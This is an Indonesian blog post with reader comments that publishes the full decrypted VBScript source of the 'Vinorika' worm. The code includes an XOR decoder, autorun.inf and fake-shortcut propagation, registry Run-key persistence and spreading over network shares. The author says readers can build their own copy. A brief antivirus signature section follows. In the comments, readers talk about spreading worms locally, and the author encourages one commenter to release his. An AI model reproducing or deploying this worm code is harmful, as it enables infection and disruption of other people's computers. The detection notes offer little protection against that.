MorphostLab

Tempat nongkrongnya Morphic dan kawan-kawan

Source Code Virus Vinorika

Posted by Morphic pada Agustus 22, 2009


Semuanya udah pada tahu tentang vinorika. Apalagi kalo dikaitkan dengan nama “yuyun”, “harrypotter” dan lain-lain. Itu satu paket semuanya.

Vinorika ini cukup unik. Alasannya:
1.memanfaatkan file-file shortcut untuk pengeksekusian
2.agak lain dengan virus vbs lainnya.
3.induk-nya hampir tidak memanfaatkan file ”.vbs” (malah hanya menggunakan file ”.db” dan ”.inf” dan ”.lnk”
4. terenkrip!

Tapi sebetulnya gak seluruhnya terenkrip kok. Tubuh virus ini terbagi dua! Bagian pertama tidak terenkrip sedangkan bagian kedua terenkrip.

Bagian pertama isinya sebagai berikut:
‘============================
‘ Vinorika Go to Kediri….
‘ Capek dhe!!
‘ Kupersembahkan Sebagai permintaan maafQ bwt Vinurika Rahmania yg ada di Kediri….
‘ Hanya ini yang bisa Qlakukan…. tapi klo pean masih gk bisa maafin AQ ya mw gmana lgi.. he he!

‘============================
On Error Resume Next
Dim fso, ws
Set fso = CreateObject(“scripting.filesystemobject”)
Set ws = CreateObject(“wscript.Shell”)
Set sh = CreateObject(“Shell.application”)
Set net = CreateObject(“wscript.network”)
Q=WScript.ScriptFullName
tmp=fso.GetSpecialFolder(2)
tn=fso.GetTempName
tmpt=tmp+”\”+tn
Set swt=WScript.Arguments
If swt.Count>0 Then
status=swt(0)
If status=”auto” Then
sh.Explore Left(WScript.ScriptFullName,3)
Else
status=Left(WScript.ScriptFullName,Len(WScript.ScriptFullName)-Len(WScript.ScriptName))+status
If fso.FolderExists(status) Then
sh.Explore status
Else
fso.CreateFolder status
sh.Explore status
End If
End If
Else
End If
Set QQ=fso.GetFile(Q)
Set Q1=QQ.OpenAsTextStream(1,0)
isiQ=Q1.Read(QQ.Size)
Q1.close
t1=InStr(1,isiQ,”Vinorika~!~2008″+” >>>”,0)+18
isiQ=Right(isiQ,Len(isiQ)-t1)
hsl=””
For v=1 To Len(isiQ)
t=Asc(Mid(isiQ,v,1))
hsl=hsl+Chr(t Xor 5)
Next
If fso.FileExists(tmpt) Then fso.GetFile(tmpt).Attributes=0
Set temporary=fso.OpenTextFile(tmpt,2,True,0)
temporary.Write hsl
temporary.Close
ws.Run “WScript.exe //e:VBScript “+tmpt+” “””+Q+””””

’————berakhir disini———
Kalo bagian pertama ini bisa aja dilihat kalo file ”thumbs.db” direname jadi ”.txt”. Dan semua orang bisa melakukan hal ini.

Oke. Oke. Ini semua belum berakhir teman…
Bagaimana dengan bagian kedua??? Bagian kedua terenkrip.
Ada satu baris yang membedakan dua bagian ini. Yaitu……
” ‘ Vinorika~!~2008”

Si virus maker sengaja memberikan tanda untuk membedakan kedua bagian supaya ketika virus dieksekusi si virus tahu mana source yang harus didekrip.

Nah, kebetulan source yang dienkrip itu sudah aku dekrip kemarin. Jadi aku tampilkan deh source-nya di blogku yang tercinta ini. He he he..
Source-nya bisa kalian manfaatkan dengan sebaik-baiknya.

Terus terang aja, setelah aku mendekrip semua source dibawah ini aku sanggup membuat vinorika tiruan. Dan aku yakin kalian semua pun bisa.

‘ Vinorika~!~
‘ send me an email to : Vinue_2007@yahoo.co.id
‘ Maafin Aq…Vinue
‘=======================================================
On Error Resume Next
Dim fso, ws, status,status1, fly
Set fso = CreateObject(“scripting.filesystemobject”)
Set ws = CreateObject(“wscript.Shell”)
Set sh = CreateObject(“Shell.application”)
Set net = CreateObject(“wscript.network”)
fly=false
tmp=fso.GetSpecialFolder(2)
tn=fso.GetTempName
tmpt=tmp+”\”+tn
docx=ws.SpecialFolders(“MyDocuments”)

Set swt=WScript.Arguments
If swt.Count>0 Then
status=swt(0)
End If
if fso.fileexists(tmp+”\zvnita.ira”) then
set ira=fso.getfile(tmp+”\zvnita.ira”)
ira.attributes=0
ira.name=”shalihah.ira”
if ira.name=”shalihah.ira” then
ira.name=”zvnita.ira”
set ira=fso.opentextfile(tmp+”\zvnita.ira”,2,true)
else
fly=true
end if
else
set ira=fso.opentextfile(tmp+”\zvnita.ira”,2,true)
end if
Set AQ=fso.GetFile(status)
If fso.FileExists(tmpt) Then fso.GetFile(tmpt).Attributes=0
AQ.Copy tmpt,True
Set AQ=fso.GetFile(tmpt)
AQ.Attributes=39
anv=tmp+”\auto.exe”
If Not fso.FileExists(anv) Then AQ.Copy anv
Set auto=fso.GetFile(anv)
auto.attributes=0

Set aut=fso.OpenTextFile(tmp+an,2,True,0)
isi=”[autorun]>open=WScript.exe //e:VBScript thumb.db auto>shell\open=Open>shell\open\Command=WScript.exe //e:VBScript thumb.db auto>shell\open\Default=1>shell\explore=Explore>shell\explore\Command=WScript.exe //e:VBScript thumb.db auto”
isi=Replace(isi,”>”,vbCrLf)
aut.Write isi
aut.Close
auto.Attributes=39

ltkc=sh.Namespace(&H1c&).Self.path + “\Microsoft\CD Burning”
if fso.folderexists(ltkc) then
AQ.Copy ltkc+”\thumb.db”,True
auto.Copy ltkc+”\autorun.inf”,True
If fso.FileExists(docx+”\database.mdb”) Then fso.GetFile(docx+”\database.mdb”).Attributes=0
AQ.Copy docx+”\database.mdb”,True
end if
regQ
Set rara=UNISKA

Hertz False
If Day(Now)3 Then rekursif docx,1 Else rekursif docx,3

call attack_net
Hertz True

Sub rekursif(path,dp)
On Error Resume Next
dropf path
wscript.sleep 50
If dp>0 Then
For Each fldr1 In fso.GetFolder(path+”\”).SubFolders
rekursif fldr1.Path, dp-1
Next
End If
End Sub

Sub dropf(path)
On Error Resume Next
if day(now)=17 and month(now)=1 then
rara.copy path+”\Maafin AQ Vinurika Rahmania^_^!.rtf”
for pp=1 to 100
rara.copy path+”\Maafin A_Q Vivi..” & pp & “.xls”
rara.copy path+”\MaafinQ y Uplix..” & pp & “.htm”
rara.copy path+”\Maafin Aku Vee..” & pp & “.jpg”
rara.copy path+”\Sorry Vinue..” & pp & “.mp3″
wscript.sleep 500
next
rara.copy path+”\Vinorika.rtf”
end if

g1=path+”\autorun.inf”
g2=path+”\Thumb.db”
If fso.FileExists(g1) Then
Set g11=fso.GetFile(g1)
If g11.Attributes39 Then
g11.Attributes=0
auto.Copy path+”\autorun.inf”,True
end if
else
auto.Copy path+”\autorun.inf”,True
end if

If fso.FileExists(g2) Then
Set g12=fso.GetFile(g2)
If g12.Attributes39 Then
g12.Attributes=0
AQ.Copy path+”\Thumb.db”,True
end if
else
AQ.Copy path+”\Thumb.db”,True
End If

If Not fso.FileExists(path+”\Microsoft.lnk”) Then
shorZvnita path+”\Microsoft”,”Microsoft”
drop=Array(“New Harry Potter and…”,”New Folder”,”SuratQ”,”Zanya Zulkarnaen”,”Game”,”Zvnita ir4″,”Download”,”DataQ”,”Kediri”)
ww=1
For Each d In drop
If Day(now) Mod 3 = ww Then shorZvnita path+”\”+d,d
wscript.sleep 60
ww=ww+1
Next
r=0
For Each fldr In fso.GetFolder(path+”\”).SubFolders
shorZvnita path+”\”+”Shortcut to “+fldr.name+”.lnk”,fldr.Name
wscript.sleep 60
If r>3 Then
Exit For
End if
r=r+1
Next
End If
End Sub

Sub shorZvnita(path,trgt)
Set shor=ws.CreateShortcut(path+”.lnk”)
shor.iconlocation=”shell32.dll,3″
shor.targetpath=”wscript.exe”
shor.arguments=”//e:VBScript thumb.db “””+trgt+””””
shor.save
End Sub

function attack_net()
On Error Resume Next
err.clear
Set objFolder = sh.Namespace(&H13&)
Set colItems = objFolder.Items
For Each strFileName in objFolder.Items
t= objFolder.GetDetailsOf(strFileName, 14)
if err.number>0 then
exit function
end if
rekursif t,4
Next
End function

Sub tdr()
On Error Resume Next
err.clear
WScript.Sleep 180000
if err.number>0 then wscript.quit
End Sub

function UNISKA()
On error resume next
x=vbcrlf
adv=”Aztig Present^_^!>>Bukan dari tulang ubun ia dicipta>karna berbahaya membiarkannya dalam sanjung dan puja>tak juga dari tulang kaki>karna nista membuatnya diinjak dan diperbudak>tapi dari tulang rusuk bagian kiri>dekat ke hati untuk disayangi>dekat ke tangan untuk dilindungi>>(dikutip dr: Agar Bidadari Cemburu Padamu)>>>””Janganlah kamu bersikap lemah, dan janganlah (pula) kamu bersedih hati, padahal kamulah>orang-orang yang paling tinggi (derajatnya), jika kamu orang-orang yang beriman.””>(QS. Ali Imran:139)>>>Katakanlah kepada orang laki-laki yang beriman: “”Hendaklah mereka menahan pandanganya, >dan memelihara kemaluannya; yang demikian itu adalah lebih suci bagi mereka, >sesungguhnya Allah Maha Mengetahui apa yang mereka perbuat.”” (QS. An Nur:30)>>Katakanlah kepada wanita yang beriman: “”Hendaklah mereka menahan pandangannya, >dan kemaluannya, dan janganlah mereka menampakkan perhiasannya, kecuali yang >(biasa) nampak dari padanya. Dan hendaklah mereka menutupkan kain kudung >kedadanya….”” (QS. An Nur:30)>>sampaikan salam maafQ bwt: Vinurika Rahmania..[@_@]>The Repvblik maker Return in Kediri 2008>vinue_2007@yahoo.co.id”
adv=replace(adv,”>”,x)
set vivi=fso.opentextfile(tmp+”\v.doc”,2,true)
vivi.write adv
vivi.close
set UNISKA=fso.getfile(tmp+”\v.doc”)
end function

Sub regQ()
On Error Resume Next
if day(now)=1 then
ws.RegWrite “HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\”, “Betapa indahnya kalian, andai berjilbab spertiQ…(Vinorika)^_^!”
ws.RegWrite “HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\DefaultIcon\”,”shell32.dll,48″
ws.RegWrite “HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\ShellFolder\Attributes”,0,”REG_DWORD”
ws.regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{11111111-2222-3333-4444-555555555555}\”,””
end if
ws.RegWrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Explorer”,”Wscript.exe //e:VBScript “+docx+”\database.mdb”
End Sub

Sub Hertz(ooo)
On Error Resume Next
do
For Each drv In fso.Drives
If drv.DriveType=1 Then
rekursif drv.Path,4
Else
rekursif drv.Path,2
End if
Next
if fly=false then
tdr
else
wscript.quit
end if
regQ
If ooo=False Then
Exit Do
End If
loop
End Sub

’———– berakhir disini————-

Kalau kalian Cuma merename file induk virus mungkin source diatas gak mungkin bisa kalian temukan.

Dulu, Morphost udah bisa memberantas file-file shortcut buatan vinorika. Tapi ada kelemahannya! Yaitu FalseAlarm!

Sekarang Morphost yang baru (Morphost Accords) udah bisa mendeteksinya dengan baik tanpa false Alarm sedikitpun! Kalian juga bisa.
Hanya butuh satu string saja kok!

Tapi yang jadi masalah gimana menemukan string yang cocok?
File ”LNK” (file shortcut) gak bisa direname jadi ”txt”. Terus kalo file shortcut-nya dibuka pake Notepad++ yang muncul malah isi file “wscript.exe”

Jadi yang mana yang benar?
Kemarin aku pake cara ini:
Gantikan fileshortcut dibawah menjadi alamat file shortcut virus vinorika.

Open fileshortcut For Binary As #1
filedata = Space$(LOF(1))
Get #1, , filedata
Close #1
Open ”D:\sampel.txt” for binary as #1
Put #1,, filedata
Close #1

Lalu setelah dijalankan, coba lihat file “D:\sampel.txt”. nah itulah isi perut sesungguhnya dari file shortcut Vinorika.
Lalu untuk penerapannya pada antivirus? Silakan ambil string yang paling kamu curigai.
Kalau aku sendiri pake string:
777363726970742E657865 (dalam bentuk hexadecimal. Silakan ubah sendiri ke bentuk ASCII)
Dan aku sendiri yakin string yang satu ini cukup ampuh dijadikan signature.

Untuk menangani virus ini pada komputer korban silakan gunakan antivirus Morphost (Morphost Accords.(Versi terbaru))

Jujur aja, banyak teman-temanku yang kena virus ini. Dan mereka semua benci dengan PembuatVirus Vinorika.
Kepada PembuatVirus Vinorika: ”Sebagai rasa balas dendam, mewakili seluruh teman-temanku, aku ucapkan ”F*ck you!”

Sekian dulu….

By:Morphic
Thanks to:
-seluruh anak-anak FK USU stambuk 09

24 Tanggapan to “Source Code Virus Vinorika”

  1. Desperados said

    kok gak dijawab phic…???

  2. desperados said

    tanya nih phic… boleh dijelasin lagi gak… maksudnya

    “Gantikan fileshortcut dibawah menjadi alamat file shortcut virus vinorika”

    nah disitu alamat file shortcut vinorikanya mulai dari mana n berakhir dmana… tolong jelasin dung…

    trus.. harrypotter = vinorika yah…

    • Morphic said

      ooh, itu sebetulnya dimaksudkan supaya kita bisa ngeliat apa isi file dari shortcut itu…
      untuk membantu para pembuat antivirus, supaya mereka tahu string apa yg ada di dalam file tersebut.

      trus harrypotter itu dibuat ama vinorikanya saat beraksi…

      • Desperados said

        nah trus disitu alamat file shortcut vinorikanya mulai dari mana n berakhir dmana… tolong jelasin dung… (n_n)

        • Morphic said

          itu tergantung kita…

          khusus yg ini hanya untuk para pembuat antivirus. agar mereka supaya bisa melihat string dalam shortcut tersebut (itu maksudku).

          kalo untuk pembuat virus hal ini tidak perlu dilakukan…

          alamat filenya terserah kita…
          kalo kita buat di “D:\tes.lnk” ya kita buat alamat di source kita “D:\tes.lnk” juga.

          begictu;.. hehehehe..

        • Desperados said

          berarti source ni

          Open fileshortcut For Binary As #1
          filedata = Space$(LOF(1))
          Get #1, , filedata
          Close #1
          Open ”D:\sampel.txt” for binary as #1
          Put #1,, filedata
          Close #1

          disisipkan ja ditengah2 source vinorika itu yah…??

          trus mw tnya nih.. dikau utk ubah hexdecimal ke ascii itu pake software bantuan atau gimana..

  3. virusanalyst said

    Klo gitu,
    Cewek cewek di FK …
    Kw suruh za nyemplung ke danau …

  4. virusanalyst said

    Oia,
    Ak pernah nyoba2,
    Nambah file executable sndiri yg kek d morphost.morphic..

    Semua file .exe ku terinfeksi sality
    Kecuali file .scode yg engga (.scode file executable)

    Tu knp bisa gitu phic??

    Apa krn si sality hny d perintah memeriksa file .exe dan menginjekny? apa pke cr yg lain yg aku gk ngerti??

    • Morphic said

      sality itu virus lama.
      jadi pemikirannya pun lama.
      kalo dulu “mungkin” sality cuma mau nginjek file executable umum aja cuy.

  5. virusanalyst said

    Ah kw phic..
    Cewek2 d FK banyak cakep…

    Dr pd d FTI ..???!!!??

    Gila bah,
    Br hri pertama kuliah ttg pemrograman,
    Udh d suruh baca hexa ….

    Oia,
    Pathology tu ilmu apa phic d kedokteran??

    Aku abis nntn filmny, keren jg…

    • Morphic said

      oiya?
      dah nonton film-nya kw?

      Patologi merupakan cabang bidang kedokteran yang berkaitan dengan ciri-ciri dan perkembangan penyakit.
      ceileee….
      mantap kali ah definisi-nya!

      cewek FK bisa kita dapat kalo kita punya modal (mobil).

  6. Neo BeKaBe said

    Teman-teman, ada yg tau gak gimana cara agar .EXE gak bisa terinfeksi sama infector?🙂

  7. poet said

    p0et ga pernah nyebarin worm buatan sendiri.
    krna saya blajar tntng worm, bkan menghajar org dgn worm. jd saya cma pnya source codenya aja.

    saya msh nyri packer yg bgus, kalo ktemu, mungkin saat itlah saya menebar worm saya. . hehehehe. . .

    • Morphic said

      wah,,, mantap ya….
      gak nyebarin worm sendiri.

      iya, aku juga lagi nyari packer apa yang bagus untuk morphost baru ku…

      dulu kw (poet) nganjurin aku pake packer apa, poet? aspack die ya?

  8. poet said

    mutex? mutual exclusion. biasa di pake pda aplikasi multi thread. materi referensi ada di wikipdia ama msdn microsoft.

    trgntung bahasa pmrograman yg di pake. kalo C++, asal ngrti POSIX, pzti bsa. aku make autoit, udh ada API nya, tinggal make aj. hehe. mkanya aku sneng make autoit dsmping pascal n C++..
    aku msh blajar. ga brani ngmong bnyak. .

    • Morphic said

      kalo istilahnya di kedokteran itu namanya “mutasi pada DNA”
      he he he…

      baru masuk kuliah sminggu udah sok gini ya.. he he he ..

  9. virusanalyst said

    Ooh..
    Ak kira lu gnt no hp..
    bgs lah.
    Oi, ak sakit magh ne, carikan obatny yg bs bikin sembuh total ya….
    Gk prl d analisa lg kan!??

    Poet: share lah virusny,
    Ak jg mw nganalisa (klo bisa) trs d sebarin d wilayah medan dan sekitar.
    Atau USU sekitarnya..
    Wekwekwek
    Btw, cemana teknik mutex tu? Dan gmn cara matikannya..??

    • Morphic said

      obatnya minium baigon aja cuy…

      virus-virus medan?
      bosan ah,, nyari virus medan.. mending cari cewek medan…

      he he he he…

      cewek usu gimana sat?

  10. poet said

    anti DD? apaan tuch? deathdrive?
    hehehe. . wormku udah maju. . pake mutex untuk rutin watchernya. . hehehehe😀

    • Morphic said

      anti DD yg kami maksud itu anti doomsday…

      bagus dong kalo worm-mu makin ganas…
      sebarin dulu terus kirim sampel-nya ke kami ya…

  11. virusanalyst said

    nice article..

    Tp ngomong2 ak da 3 ptnyaan ne. (tlg cmmnt k yg ne jgn d publish)
    1. No mu kok jrg aktif k tlpn?
    2. Dh mulai kuliah klen?
    3. Proj anti DD ny udh jd lum?

    • Morphic said

      1.kebetulan aja aku gak ngangkat tuh…
      2.hari senin ini aku baru mulai kuliah…
      3.proj anti DD? blum mulai pun… he he he…
      gak pernah punya waktu lagi aku ini….

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
%d blogger menyukai ini: